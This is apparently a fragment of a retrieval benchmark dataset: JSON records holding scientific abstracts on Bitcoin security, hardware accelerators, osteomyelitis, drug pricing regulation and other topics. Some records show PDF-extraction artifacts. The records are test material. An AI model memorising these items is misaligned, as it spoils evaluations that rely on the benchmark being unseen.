"docid": "a172cd697bfcb1f3d2a824bb6a5bb6d1",
"text": "Bitcoin provides two incentives for miners: block rewards and transaction fees. The former accounts for the vast majority of miner revenues at the beginning of the system, but it is expected to transition to the latter as the block rewards dwindle. There has been an implicit belief that whether miners are paid by block rewards or transaction fees does not affect the security of the block chain.\n We show that this is not the case. Our key insight is that with only transaction fees, the variance of the block reward is very high due to the exponentially distributed block arrival time, and it becomes attractive to fork a \"wealthy\" block to \"steal\" the rewards therein. We show that this results in an equilibrium with undesirable properties for Bitcoin's security and performance, and even non-equilibria in some circumstances. We also revisit selfish mining and show that it can be made profitable for a miner with an arbitrarily low hash power share, and who is arbitrarily poorly connected within the network. Our results are derived from theoretical analysis and confirmed by a new Bitcoin mining simulator that may be of independent interest.\n We discuss the troubling implications of our results for Bitcoin's future security and draw lessons for the design of new cryptocurrencies.",
"title": ""
},
{
"docid": "ed447f3f4bbe8478e9e1f3c4593dbf1b",
"text": "We revisit the fundamental question of Bitcoin's security against double spending attacks. While previous work has bounded the probability that a transaction is reversed, we show that no such guarantee can be effectively given if the attacker can choose when to launch the attack. Other approaches that bound the cost of an attack have erred in considering only limited attack scenarios, and in fact it is easy to show that attacks may not cost the attacker at all. We therefore provide a different interpretation of the results presented in previous papers and correct them in several ways. We provide different notions of the security of transactions that provide guarantees to different classes of defenders: merchants who regularly receive payments, miners, and recipients of large one-time payments. We additionally consider an attack that can be launched against lightweight clients, and show that these are less secure than their full node counterparts and provide the right strategy for defenders in this case as well. Our results, overall, improve the understanding of Bitcoin's security guarantees and provide correct bounds for those wishing to safely accept transactions.",
"title": ""
}
] | [
{
"docid": "45c48cce2e2d7fbdea1afc51c7c6ad26",
"text": "9",
"title": ""
},
{
"docid": "a4fbb63fa62ec2985b395521d51191dd",
"text": "Deep Neural Networks expose a high degree of parallelism, making them amenable to highly data parallel architectures. However, data-parallel architectures often accept inefficiency in individual computations for the sake of overall efficiency. We show that on average, activation values of convolutional layers during inference in modern Deep Convolutional Neural Networks (CNNs) contain 92% zero bits. Processing these zero bits entails ineffectual computations that could be skipped. We propose Pragmatic (PRA), a massively data-parallel architecture that eliminates most of the ineffectual computations on-the-fly, improving performance and energy efficiency compared to state-of-the-art high-performance accelerators [5]. The idea behind PRA is deceptively simple: use serial-parallel shift-and-add multiplication while skipping the zero bits of the serial input. However, a straightforward implementation based on shift-and-add multiplication yields unacceptable area, power and memory access overheads compared to a conventional bit-parallel design. PRA incorporates a set of design decisions to yield a practical, area and energy efficient design.\n Measurements demonstrate that for convolutional layers, PRA is 4.31X faster than DaDianNao [5] (DaDN) using a 16-bit fixed-point representation. While PRA requires 1.68X more area than DaDN, the performance gains yield a 1.70X increase in energy efficiency in a 65nm technology. With 8-bit quantized activations, PRA is 2.25X faster and 1.31X more energy efficient than an 8-bit version of DaDN.",
"title": ""
},
{
"docid": "aa45f36e893c17fd364051b7b8d4c9b4",
"text": "Identifying the location of performance bottlenecks is a non-trivial challenge when scaling n-tier applications in computing clouds. Specifically, we observed that an n-tier application may experience significant performance loss when there are transient bottlenecks in component servers. Such transient bottlenecks arise frequently at high resource utilization and often result from transient events (e.g., JVM garbage collection) in an n-tier system and bursty workloads. Because of their short lifespan (e.g., milliseconds), these transient bottlenecks are difficult to detect using current system monitoring tools with sampling at intervals of seconds or minutes. We describe a novel transient bottleneck detection method that correlates throughput (i.e., request service rate) and load (i.e., number of concurrent requests) of each server in an n-tier system at fine time granularity. Both throughput and load can be measured through passive network tracing at millisecond-level time granularity. Using correlation analysis, we can identify the transient bottlenecks at time granularities as short as 50ms. We validate our method experimentally through two case studies on transient bottlenecks caused by factors at the system software layer (e.g., JVM garbage collection) and architecture layer (e.g., Intel SpeedStep).",
"title": ""
},
{
"docid": "cab91b728b363f362535758dd9ac57b3",
"text": "The multimodal nature of speech is often ignored in human-computer interaction, but lip deformations and other body motion, such as those of the head, convey additional information. We integrate speech cues from many sources and this improves intelligibility, especially when the acoustic signal is degraded. This paper shows how this additional, often complementary, visual speech information can be used for speech recognition. Three methods for parameterizing lip image sequences for recognition using hidden Markov models are compared. Two of these are top-down approaches that fit a model of the inner and outer lip contours and derive lipreading features from a principal component analysis of shape or shape and appearance, respectively. The third, bottom-up, method uses a nonlinear scale-space analysis to form features directly from the pixel intensity. All methods are compared on a multitalker visual speech recognition task of isolated letters.",
"title": ""
},
{
"docid": "9027f5db4917113f9dd658caddda4f88",
"text": "In this paper, two different types of ultra-fast electromechanical actuators are compared using a multi-physical finite element simulation model that has been experimentally validated. They are equipped with a single-sided Thomson coil (TC) and a double-sided drive coil (DSC), respectively. The former consists of a spirally-wound flat coil with a copper armature on top, while the latter consists of two mirrored spiral coils that are connected in series. Initially, the geometry and construction of each of the actuating schemes are discussed. Subsequently, the theory behind the two force generation principles are described. Furthermore, the current, magnetic flux densities, accelerations, and induced stresses are analyzed. Moreover, mechanical loadability simulations are performed to study the impact on the requirements of the charging unit, the sensitivity of the parameters, and evaluate the degree of influence on the performance of both drives. Finally, it is confirmed that although the DSC is mechanically more complex, it has a greater efficiency than that of the TC.",
"title": ""
},
{
"docid": "79c1237142f82b3e316e784c45fd68c6",
"text": "The incidence of chronic osteomyelitis is increasing because of the prevalence of predisposing conditions such as diabetes mellitus and peripheral vascular disease. The increased availability of sensitive imaging tests, such as magnetic resonance imaging and bone scintigraphy, has improved diagnostic accuracy and the ability to characterize the infection. Plain radiography is a useful initial investigation to identify alternative diagnoses and potential complications. Direct sampling of the wound for culture and antimicrobial sensitivity is essential to target treatment. The increased incidence of methicillin-resistant Staphylococcus aureus osteomyelitis complicates antibiotic selection. Surgical debridement is usually necessary in chronic cases. The recurrence rate remains high despite surgical intervention and long-term antibiotic therapy. Acute hematogenous osteomyelitis in children typically can be treated with a four-week course of antibiotics. In adults, the duration of antibiotic treatment for chronic osteomyelitis is typically several weeks longer. In both situations, however, empiric antibiotic coverage for S. aureus is indicated.",
"title": ""
},
{
"docid": "51ddbc18a9e5a460038676b7d5dc6f10",
"text": "The selection, development, or comparison of machine learning methods in data mining can be a difficult task based on the target problem and goals of a particular study. Numerous publicly available real-world and simulated benchmark datasets have emerged from different sources, but their organization and adoption as standards have been inconsistent. As such, selecting and curating specific benchmarks remains an unnecessary burden on machine learning practitioners and data scientists. The present study introduces an accessible, curated, and developing public benchmark resource to facilitate identification of the strengths and weaknesses of different machine learning methodologies. We compare meta-features among the current set of benchmark datasets in this resource to characterize the diversity of available data. Finally, we apply a number of established machine learning methods to the entire benchmark suite and analyze how datasets and algorithms cluster in terms of performance. From this study, we find that existing benchmarks lack the diversity to properly benchmark machine learning algorithms, and there are several gaps in benchmarking problems that still need to be considered. This work represents another important step towards understanding the limitations of popular benchmarking suites and developing a resource that connects existing benchmarking standards to more diverse and efficient standards in the future.",
"title": ""
},
{
"docid": "fe3afe69ec27189400e65e8bdfc5bf0b",
"text": "speech learning changes over the life span and to explain why \"earlier is better\" as far as learning to pronounce a second language (L2) is concerned. An assumption we make is that the phonetic systems used in the production and perception of vowels and consonants remain adaptive over the life span, and that phonetic systems reorganize in response to sounds encountered in an L2 through the addition of new phonetic categories, or through the modification of old ones. The chapter is organized in the following way. Several general hypotheses concerning the cause of foreign accent in L2 speech production are summarized in the introductory section. In the next section, a model of L2 speech learning that aims to account for age-related changes in L2 pronunciation is presented. The next three sections present summaries of empirical research dealing with the production and perception of L2 vowels, word-initial consonants, and word-final consonants. The final section discusses questions of general theoretical interest, with special attention to a featural (as opposed to a segmental) level of analysis. Although nonsegmental (Le., prosodic) dimensions are an important source of foreign accent, the present chapter focuses on phoneme-sized units of speech. Although many different languages are learned as an L2, the focus is on the acquisition of English.",
"title": ""
},
{
"docid": "4d59fd865447cfd1d54623e267af491c",
"text": "Visual relationships capture a wide variety of interactions between pairs of objects in images (e.g. “man riding bicycle” and “man pushing bicycle”). Consequently, the set of possible relationships is extremely large and it is difficult to obtain sufficient training examples for all possible relationships. Because of this limitation, previous work on visual relationship detection has concentrated on predicting only a handful of relationships. Though most relationships are infrequent, their objects (e.g. “man” and “bicycle”) and predicates (e.g. “riding” and “pushing”) independently occur more frequently. We propose a model that uses this insight to train visual models for objects and predicates individually and later combines them together to predict multiple relationships per image. We improve on prior work by leveraging language priors from semantic word embeddings to finetune the likelihood of a predicted relationship. Our model can scale to predict thousands of types of relationships from a few examples. Additionally, we localize the objects in the predicted relationships as bounding boxes in the image. We further demonstrate that understanding relationships can improve content based image retrieval.",
"title": ""
},
{
"docid": "9af37841feed808345c39ee96ddff914",
"text": "Wake-up receivers (WuRXs) are low-power radios that continuously monitor the RF environment to wake up a higher-power radio upon detection of a predetermined RF signature. Prior-art WuRXs have 100s of kHz of bandwidth [1] with low signature-to-wake-up-signal latency to help synchronize communication amongst nominally asynchronous wireless devices. However, applications such as unattended ground sensors and smart home appliances wake-up infrequently in an event-driven manner, and thus WuRX bandwidth and latency are less critical; instead, the most important metrics are power consumption and sensitivity. Unfortunately, current state-of-the-art WuRXs utilizing direct envelope-detecting [2] and IF/uncertain-IF [1,3] architectures (Fig. 24.5.1) achieve only modest sensitivity at low-power (e.g., −39dBm at 104nW [2]), or achieve excellent sensitivity at higher-power (e.g., −97dBm at 99µW [3]) via active IF gain elements. Neither approach meets the needs of next-generation event-driven sensing networks.",
"title": ""
},
{
"docid": "5ca5cfcd0ed34d9b0033977e9cde2c74",
"text": "We study the impact of regulation on competition between brand-names and generics and pharmaceutical expenditures using a unique policy experiment in Norway, where reference pricing (RP) replaced price cap regulation in 2003 for a sub-sample of o¤-patent products. First, we construct a vertical di¤erentiation model to analyze the impact of regulation on prices and market shares of brand-names and generics. Then, we exploit a detailed panel data set at product level covering several o¤-patent molecules before and after the policy reform. O¤-patent drugs not subject to RP serve as our control group. We
nd that RP signi
cantly reduces both brand-name and generic prices, and results in signi
cantly lower brand-name market shares. Finally, we show that RP has a strong negative e¤ect on average molecule prices, suggesting signi
cant cost-savings, and that patients copayments decrease despite the extra surcharges under RP. Key words: Pharmaceuticals; Regulation; Generic Competition JEL Classi
cations: I11; I18; L13; L65 We thank David Bardey, Øivind Anti Nilsen, Frode Steen, and two anonymous referees for valuable comments and suggestions. We also thank the Norwegian Research Council, Health Economics Bergen (HEB) for
nancial support. Corresponding author. Department of Economics and Health Economics Bergen, Norwegian School of Economics and Business Administration, Helleveien 30, N-5045 Bergen, Norway. E-mail: kurt.brekke@nhh.no. Uni Rokkan Centre, Health Economics Bergen, Nygårdsgaten 5, N-5015 Bergen, Norway. E-mail: tor.holmas@uni.no. Department of Economics/NIPE, University of Minho, Campus de Gualtar, 4710-057 Braga, Portugal; and University of Bergen (Economics), Norway. E-mail: o.r.straume@eeg.uminho.pt.",
"title": ""
},
{
"docid": "b7524787cce58c3bf34a9d7fd3c8af90",
"text": "Convolutional Neural Networks and Graphics Processing Units have been at the core of a paradigm shift in computer vision research that some researchers have called “the algorithmic perception revolution.” This thesis presents the implementation and analysis of several techniques for performing artistic style transfer using a Convolutional Neural Network architecture trained for large-scale image recognition tasks. We present an implementation of an existing algorithm for artistic style transfer in images and video. The neural algorithm separates and recombines the style and content of arbitrary images. Additionally, we present an extension of the algorithm to perform weighted artistic style transfer.",
"title": ""
},
{
"docid": "f4562d3b45761d01e64f1f72bee5eec7",
"text": "We introduce two Python frameworks to train neural networks on large datasets: Blocks and Fuel. Blocks is based on Theano, a linear algebra compiler with CUDA-support (Bastien et al., 2012; Bergstra et al., 2010). It facilitates the training of complex neural network models by providing parametrized Theano operations, attaching metadata to Theano’s symbolic computational graph, and providing an extensive set of utilities to assist training the networks, e.g. training algorithms, logging, monitoring, visualization, and serialization. Fuel provides a standard format for machine learning datasets. It allows the user to easily iterate over large datasets, performing many types of pre-processing on the fly.",
"title": ""
},
{
"docid": "7f9515a848cca72fb1864c55e6e52e50",
"text": "William 111. Waite ver the past five years, our group has developed the Eli’ system to reduce the cost of producing compilers. Eli has been used to construct complete compilers for standard programming languages extensions to standard programming languages, and specialpurpose languages. For the remainder of this article, we will use the term compiler when referring to language processors. One of the most important ways to enhance productivity in software engineering is to provide more appropriate descriptions of problems and their",
"title": ""
},
{
"docid": "b6d8e6b610eff993dfa93f606623e31d",
"text": "Data journalism designates journalistic work inspired by digital data sources. A particularly popular and active area of data journalism is concerned with fact-checking. The term was born in the journalist community and referred the process of verifying and ensuring the accuracy of published media content; since 2012, however, it has increasingly focused on the analysis of politics, economy, science, and news content shared in any form, but first and foremost on the Web (social and otherwise). These trends have been noticed by computer scientists working in the industry and academia. Thus, a very lively area of digital content management research has taken up these problems and works to propose foundations (models), algorithms, and implement them through concrete tools. Our tutorial: (i) Outlines the current state of affairs in the area of digital (or computational) fact-checking in newsrooms, by journalists, NGO workers, scientists and IT companies; (ii) Shows which areas of digital content management research, in particular those relying on the Web, can be leveraged to help fact-checking, and gives a comprehensive survey of efforts in this area; (iii) Highlights ongoing trends, unsolved problems, and areas where we envision future scientific and practical advances. PVLDB Reference Format: S. Cazalens, J. Leblay, P. Lamarre, I. Manolescu, X. Tannier. Computational Fact Checking: A Content Management Perspective. PVLDB, 11 (12): 2110-2113, 2018. DOI: https://doi.org/10.14778/3229863.3229880 This work is licensed under the Creative Commons AttributionNonCommercial-NoDerivatives 4.0 International License. To view a copy of this license, visit http://creativecommons.org/licenses/by-nc-nd/4.0/. For any use beyond those covered by this license, obtain permission by emailing info@vldb.org. Proceedings of the VLDB Endowment, Vol. 11, No. 12 Copyright 2018 VLDB Endowment 2150-8097/18/8. DOI: https://doi.org/10.14778/3229863.3229880 1. OUTLINE In Section 1.1, we provide a short history of journalistic fact-checking and presents its most recent and visible actors, from the media and/or NGO communities. Section 1.2 discusses the scientific content management areas which bring useful tools for computational fact-checking. 1.1 Data journalism and fact-checking While data of some form is a natural ingredient of all reporting, the increasing volumes and complexity of digital data lead to a qualitative jump, where technical skills, and in particular data science skills, are stringently needed in journalistic work. A particularly popular and active area of data journalism is concerned with fact-checking. The term was born in the journalist community; it referred to the task of identifying and checking factual claims present in media content, which dedicated newsroom personnel would then check for factual accuracy. The goal of such checking was to avoid misinformation, to protect the journal reputation and avoid legal actions. Starting around 2012, first in the United States (FactCheck.org), then in Europe, and soon after in all areas of the world, journalists have started to take advantage of modern technologies for processing content, such as text, video, structured and unstructured data, in order to automate, at least partially, the knowledge finding, reasoning, and analysis tasks which had been previously performed completely by humans. Over time, the focus of fact-checking shifted from verifying claims made by media outlets, toward the claims made by politicians and other public figures. 
This trend coincided with the parallel (but distinct) evolution toward asking Government Open Data, that is: the idea that governing bodies should share with the public precise information describing their functioning, so that the people have means to assess the quality of their elected representation. Government Open Data became quickly available, in large volumes, e.g. through data.gov in the US, data.gov.uk in the UK, data.gouv.fr in France etc.; journalists turned out to be the missing link between the newly available data and comprehension by the public. Data journalism thus found http://factcheck.org",
"title": ""
},
{
"docid": "e16d89d3a6b3d38b5823fae977087156",
"text": "The payoff of abarrier option depends on whether or not a specified asset price, index, or rate reaches a specified level during the life of the option. Most models for pricing barrier options assume continuous monitoring of the barrier; under this assumption, the option can often be priced in closed form. Many (if not most) real contracts with barrier provisions specify discrete monitoring instants; there are essentially no formulas for pricing these options, and even numerical pricing is difficult. We show, however, that discrete barrier options can be priced with remarkable accuracy using continuous barrier formulas by applying a simple continuity correction to the barrier. The correction shifts the barrier away from the underlying by a factor of exp (βσ √ 1t), whereβ ≈ 0.5826,σ is the underlying volatility, and1t is the time between monitoring instants. The correction is justified both theoretically and experimentally.",
"title": ""
},
{
"docid": "691f992fe99d6e16a97f694375014d16",
"text": "Database fragmentation allows reducing irrelevant data accesses by grouping data frequently accessed together in dedicated segments. In this paper, we address multimedia database fragmentation to take into account the rich characteristics of multimedia objects. We particularly discuss multimedia primary horizontal fragmentation and focus on semantic-based textual predicates implication required as a pre-process in current fragmentation algorithms in order to partition multimedia data efficiently. Identifying semantic implication between similar queries (if a user searches for the images containing a car, he would probably mean auto, vehicle, van or sport-car as well) will improve the fragmentation process. Making use of the neighborhood concept in knowledge bases to identify semantic implications constitutes the core of our proposal. A prototype has been implemented to evaluate the performance of our approach.",
"title": ""
},
{
"docid": "08cf1e6353fa3c9969188d946874c305",
"text": "In this paper we develop, analyze, and test a new algorithm for the global minimization of a function subject to simple bounds without the use of derivatives. The underlying algorithm is a pattern search method, more specifically a coordinate search method, which guarantees convergence to stationary points from arbitrary starting points. In the optional search phase of pattern search we apply a particle swarm scheme to globally explore the possible nonconvexity of the objective function. Our extensive numerical experiments showed that the resulting algorithm is highly competitive with other global optimization methods also based on function values.",
"title": ""
},
{
"docid": "ae4b651ea8bd6b4c7c6efcc52f76516e",
"text": "We study a regularization framework where we feed an original clean data point and a nearby point through a mapping, which is then penalized by the Euclidian distance between the corresponding outputs. The nearby point may be chosen randomly or adversarially. A more general form of this framework has been presented in (Bachman et al., 2014). We relate this framework to many existing regularization methods: It is a stochastic estimate of penalizing the Frobenius norm of the Jacobian of the mapping as in Poggio & Girosi (1990), it generalizes noise regularization (Sietsma & Dow, 1991), and it is a simplification of the canonical regularization term by the ladder networks in Rasmus et al. (2015). We also investigate the connection to virtual adversarial training (VAT) (Miyato et al., 2016) and show how VAT can be interpreted as penalizing the largest eigenvalue of a Fisher information matrix. Our contribution is discovering connections between the studied and other existing regularization methods.",
"title": ""
},
{
"docid": "eef1e51e4127ed481254f97963496f48",
"text": "-Vehicular ad hoc networks (VANETs) are wireless networks that do not require any fixed infrastructure. Regarding traffic safety applications for VANETs, warning messages have to be quickly and smartly disseminated in order to reduce the required dissemination time and to increase the number of vehicles receiving the traffic warning information. Adaptive techniques for VANETs usually consider features related to the vehicles in the scenario, such as their density, speed, and position, to adapt the performance of the dissemination process. These approaches are not useful when trying to warn the highest number of vehicles about dangerous situations in realistic vehicular environments. The Profile-driven Adaptive Warning Dissemination Scheme (PAWDS) designed to improve the warning message dissemination process. PAWDS system that dynamically modifies some of the key parameters of the propagation process and it cannot detect the vehicles which are in the dangerous position. Proposed system identifies the vehicles which are in the dangerous position and to send warning messages immediately. The vehicles must make use of all the available information efficiently to predict the position of nearby vehicles. Keywords— PAWDS, VANET, Ad hoc network , OBU , RSU, GPS.",
"title": ""
}
] | scidocsrr |
d886efe936a8e226d501740d9937ad58 | Low-resource OCR error detection and correction in French Clinical Texts | [
{
"docid": "5510f5e1bcf352e3219097143200531f",
"text": "Research aimed at correcting words in text has focused on three progressively more difficult problems:(1) nonword error detection; (2) isolated-word error correction; and (3) context-dependent work correction. In response to the first problem, efficient pattern-matching and n-gram analysis techniques have been developed for detecting strings that do not appear in a given word list. In response to the second problem, a variety of general and application-specific spelling correction techniques have been developed. Some of them were based on detailed studies of spelling error patterns. In response to the third problem, a few experiments using natural-language-processing tools or statistical-language models have been carried out. This article surveys documented findings on spelling error patterns, provides descriptions of various nonword detection and isolated-word error correction techniques, reviews the state of the art of context-dependent word correction techniques, and discusses research issues related to all three areas of automatic error correction in text.",
"title": ""
}
] | [
{
"docid": "b911c86e5672f9a669e25c7771076d24",
"text": "This paper discusses an implementation of Extended Kalman filter (EKF) in performing Simultaneous Localization and Mapping (SLAM). The implementation is divided into software and hardware phases. The software implementation applies EKF using Python on a library dataset to produce a map of the supposed environment. The result was verified against the original map and found to be relatively accurate with minor inaccuracies. In the hardware implementation stage, real life data was gathered from an indoor environment via a laser range finder and a pair of wheel encoders placed on a mobile robot. The resulting map shows at least five marked inaccuracies but the overall form is passable.",
"title": ""
},
{
"docid": "e027e472740cea38ef29a347442b14d9",
"text": "De-noising and segmentation are fundamental steps in processing of images. They can be used as preprocessing and post-processing step. They are used to enhance the image quality. Various medical imaging that are used in these days are Magnetic Resonance Images (MRI), Ultrasound, X-Ray, CT Scan etc. Various types of noises affect the quality of images which may lead to unpredictable results. Various noises like speckle noise, Gaussian noise and Rician noise is present in ultrasound, MRI respectively. With the segmentation region required for analysis and diagnosis purpose is extracted. Various algorithm for segmentation like watershed, K-mean clustering, FCM, thresholding, region growing etc. exist. In this paper, we propose an improved watershed segmentation using denoising filter. First of all, image will be de-noised with morphological opening-closing technique then watershed transform using linear correlation and convolution operations is applied to improve efficiency, accuracy and complexity of the algorithm. In this paper, watershed segmentation and various techniques which are used to improve the performance of watershed segmentation are discussed and comparative analysis is done.",
"title": ""
},
{
"docid": "1da747ae58d80c218811618be4538a7b",
"text": "Smartphones and other trendy mobile wearable devices are rapidly becoming the dominant sensing, computing and communication devices in peoples' daily lives. Mobile crowd sensing is an emerging technology based on the sensing and networking capabilities of such mobile wearable devices. MCS has shown great potential in improving peoples' quality of life, including healthcare and transportation, and thus has found a wide range of novel applications. However, user privacy and data trustworthiness are two critical challenges faced by MCS. In this article, we introduce the architecture of MCS and discuss its unique characteristics and advantages over traditional wireless sensor networks, which result in inapplicability of most existing WSN security solutions. Furthermore, we summarize recent advances in these areas and suggest some future research directions.",
"title": ""
},
{
"docid": "ed9528fe8e4673c30de35d33130c728e",
"text": "This paper introduces a friendly system to control the home appliances remotely by the use of mobile cell phones; this system is well known as “Home Automation System” (HAS).",
"title": ""
},
{
"docid": "74bac9b30cb29eb67df0bdc71f3c4583",
"text": "BACKGROUND\nMedical practitioners use survival models to explore and understand the relationships between patients' covariates (e.g. clinical and genetic features) and the effectiveness of various treatment options. Standard survival models like the linear Cox proportional hazards model require extensive feature engineering or prior medical knowledge to model treatment interaction at an individual level. While nonlinear survival methods, such as neural networks and survival forests, can inherently model these high-level interaction terms, they have yet to be shown as effective treatment recommender systems.\n\n\nMETHODS\nWe introduce DeepSurv, a Cox proportional hazards deep neural network and state-of-the-art survival method for modeling interactions between a patient's covariates and treatment effectiveness in order to provide personalized treatment recommendations.\n\n\nRESULTS\nWe perform a number of experiments training DeepSurv on simulated and real survival data. We demonstrate that DeepSurv performs as well as or better than other state-of-the-art survival models and validate that DeepSurv successfully models increasingly complex relationships between a patient's covariates and their risk of failure. We then show how DeepSurv models the relationship between a patient's features and effectiveness of different treatment options to show how DeepSurv can be used to provide individual treatment recommendations. Finally, we train DeepSurv on real clinical studies to demonstrate how it's personalized treatment recommendations would increase the survival time of a set of patients.\n\n\nCONCLUSIONS\nThe predictive and modeling capabilities of DeepSurv will enable medical researchers to use deep neural networks as a tool in their exploration, understanding, and prediction of the effects of a patient's characteristics on their risk of failure.",
"title": ""
},
{
"docid": "da540860f3ecb9ca15148a7315b74a45",
"text": "Learning mathematics is one of the most important aspects that determine the future of learners. However, mathematics as one of the subjects is often perceived as being complicated and not liked by the learners. Therefore, we need an application with the use of appropriate technology to create visualization effects which can attract more attention from learners. The application of Augmented Reality technology in digital game is a series of efforts made to create a better visualization effect. In addition, the system is also connected to a leaderboard web service in order to improve the learning motivation through competitive process. Implementation of Augmented Reality is proven to improve student's learning motivation moreover implementation of Augmented Reality in this game is highly preferred by students.",
"title": ""
},
{
"docid": "46ab119ffd9850fe1e5ff35b6cda267d",
"text": "Wireless sensor networks are expected to find wide applicability and increasing deployment in the near future. In this paper, we propose a formal classification of sensor networks, based on their mode of functioning, as proactive and reactive networks. Reactive networks, as opposed to passive data collecting proactive networks, respond immediately to changes in the relevant parameters of interest. We also introduce a new energy efficient protocol, TEEN (Threshold sensitive Energy Efficient sensor Network protocol) for reactive networks. We evaluate the performance of our protocol for a simple temperature sensing application. In terms of energy efficiency, our protocol has been observed to outperform existing conventional sensor network protocols.",
"title": ""
},
{
"docid": "0ba036ae72811c02179842f1949974b6",
"text": "The authors propose a new climatic drought index: the standardized precipitation evapotranspiration index (SPEI). The SPEI is based on precipitation and temperature data, and it has the advantage of combining multiscalar character with the capacity to include the effects of temperature variability on drought assessment. The procedure to calculate the index is detailed and involves a climatic water balance, the accumulation of deficit/surplus at different time scales, and adjustment to a log-logistic probability distribution. Mathematically, the SPEI is similar to the standardized precipitation index (SPI), but it includes the role of temperature. Because the SPEI is based on a water balance, it can be compared to the self-calibrated Palmer drought severity index (sc-PDSI). Time series of the three indices were compared for a set of observatories with different climate characteristics, located in different parts of the world. Under global warming conditions, only the sc-PDSI and SPEI identified an increase in drought severity associated with higher water demand as a result of evapotranspiration. Relative to the sc-PDSI, the SPEI has the advantage of being multiscalar, which is crucial for drought analysis and monitoring.",
"title": ""
},
{
"docid": "5a8916d6019cf10784b2258299eb6ceb",
"text": "In recent years, there is global demand for Islamic knowledge by both Muslims and non-Muslims. This has brought about number of automated applications that ease the retrieval of knowledge from the holy books. However current retrieval methods lack semantic information they are mostly base on keywords matching approach. In this paper we have proposed a Model that will make use of semantic Web technologies (ontology) to model Quran domain knowledge. The system will enhance Quran knowledge by enabling queries in natural language.",
"title": ""
},
{
"docid": "e6d05a96665c2651c0b31f1bff67f04d",
"text": "Detecting the neural processes like axons and dendrites needs high quality SEM images. This paper proposes an approach using perceptual grouping via a graph cut and its combinations with Convolutional Neural Network (CNN) to achieve improved segmentation of SEM images. Experimental results demonstrate improved computational efficiency with linear running time.",
"title": ""
},
{
"docid": "4136eb42db90f60196cf828231039707",
"text": "Most of the existing model verification and validation techniques are largely used in the industrial and system engineering fields. The agent-based modeling approach is different from traditional equation-based modeling approach in many aspects. As the agent-based modeling approach has recently become an attractive and efficient way for modeling large-scale complex systems, there are few formalized validation methodologies existing for model validation. In our proposed work, we design, develop, adapt, and apply various verification and validation techniques to an agent-based scientific model and investigate the sufficiency of these techniques for the validation of agent-based mod-",
"title": ""
},
{
"docid": "3afa9f84c76bdca939c0a3dc645b4cbf",
"text": "Recurrent neural networks are theoretically capable of learning complex temporal sequences, but training them through gradient-descent is too slow and unstable for practical use in reinforcement learning environments. Neuroevolution, the evolution of artificial neural networks using genetic algorithms, can potentially solve real-world reinforcement learning tasks that require deep use of memory, i.e. memory spanning hundreds or thousands of inputs, by searching the space of recurrent neural networks directly. In this paper, we introduce a new neuroevolution algorithm called Hierarchical Enforced SubPopulations that simultaneously evolves networks at two levels of granularity: full networks and network components or neurons. We demonstrate the method in two POMDP tasks that involve temporal dependencies of up to thousands of time-steps, and show that it is faster and simpler than the current best conventional reinforcement learning system on these tasks.",
"title": ""
},
{
"docid": "f70447a47fb31fc94d6b57ca3ef57ad3",
"text": "BACKGROUND\nOn Aug 14, 2014, the US Food and Drug Administration approved the antiangiogenesis drug bevacizumab for women with advanced cervical cancer on the basis of improved overall survival (OS) after the second interim analysis (in 2012) of 271 deaths in the Gynecologic Oncology Group (GOG) 240 trial. In this study, we report the prespecified final analysis of the primary objectives, OS and adverse events.\n\n\nMETHODS\nIn this randomised, controlled, open-label, phase 3 trial, we recruited patients with metastatic, persistent, or recurrent cervical carcinoma from 81 centres in the USA, Canada, and Spain. Inclusion criteria included a GOG performance status score of 0 or 1; adequate renal, hepatic, and bone marrow function; adequately anticoagulated thromboembolism; a urine protein to creatinine ratio of less than 1; and measurable disease. Patients who had received chemotherapy for recurrence and those with non-healing wounds or active bleeding conditions were ineligible. We randomly allocated patients 1:1:1:1 (blocking used; block size of four) to intravenous chemotherapy of either cisplatin (50 mg/m2 on day 1 or 2) plus paclitaxel (135 mg/m2 or 175 mg/m2 on day 1) or topotecan (0·75 mg/m2 on days 1-3) plus paclitaxel (175 mg/m2 on day 1) with or without intravenous bevacizumab (15 mg/kg on day 1) in 21 day cycles until disease progression, unacceptable toxic effects, voluntary withdrawal by the patient, or complete response. We stratified randomisation by GOG performance status (0 vs 1), previous radiosensitising platinum-based chemotherapy, and disease status (recurrent or persistent vs metastatic). We gave treatment open label. Primary outcomes were OS (analysed in the intention-to-treat population) and adverse events (analysed in all patients who received treatment and submitted adverse event information), assessed at the second interim and final analysis by the masked Data and Safety Monitoring Board. The cutoff for final analysis was 450 patients with 346 deaths. This trial is registered with ClinicalTrials.gov, number NCT00803062.\n\n\nFINDINGS\nBetween April 6, 2009, and Jan 3, 2012, we enrolled 452 patients (225 [50%] in the two chemotherapy-alone groups and 227 [50%] in the two chemotherapy plus bevacizumab groups). By March 7, 2014, 348 deaths had occurred, meeting the prespecified cutoff for final analysis. The chemotherapy plus bevacizumab groups continued to show significant improvement in OS compared with the chemotherapy-alone groups: 16·8 months in the chemotherapy plus bevacizumab groups versus 13·3 months in the chemotherapy-alone groups (hazard ratio 0·77 [95% CI 0·62-0·95]; p=0·007). Final OS among patients not receiving previous pelvic radiotherapy was 24·5 months versus 16·8 months (0·64 [0·37-1·10]; p=0·11). Postprogression OS was not significantly different between the chemotherapy plus bevacizumab groups (8·4 months) and chemotherapy-alone groups (7·1 months; 0·83 [0·66-1·05]; p=0·06). Fistula (any grade) occurred in 32 (15%) of 220 patients in the chemotherapy plus bevacizumab groups (all previously irradiated) versus three (1%) of 220 in the chemotherapy-alone groups (all previously irradiated). Grade 3 fistula developed in 13 (6%) versus one (<1%). No fistulas resulted in surgical emergencies, sepsis, or death.\n\n\nINTERPRETATION\nThe benefit conferred by incorporation of bevacizumab is sustained with extended follow-up as evidenced by the overall survival curves remaining separated. 
After progression while receiving bevacizumab, we did not observe a negative rebound effect (ie, shorter survival after bevacizumab is stopped than after chemotherapy alone is stopped). These findings represent proof-of-concept of the efficacy and tolerability of antiangiogenesis therapy in advanced cervical cancer.\n\n\nFUNDING\nNational Cancer Institute.",
"title": ""
},
{
"docid": "80d859e26c815e5c6a8c108ab0141462",
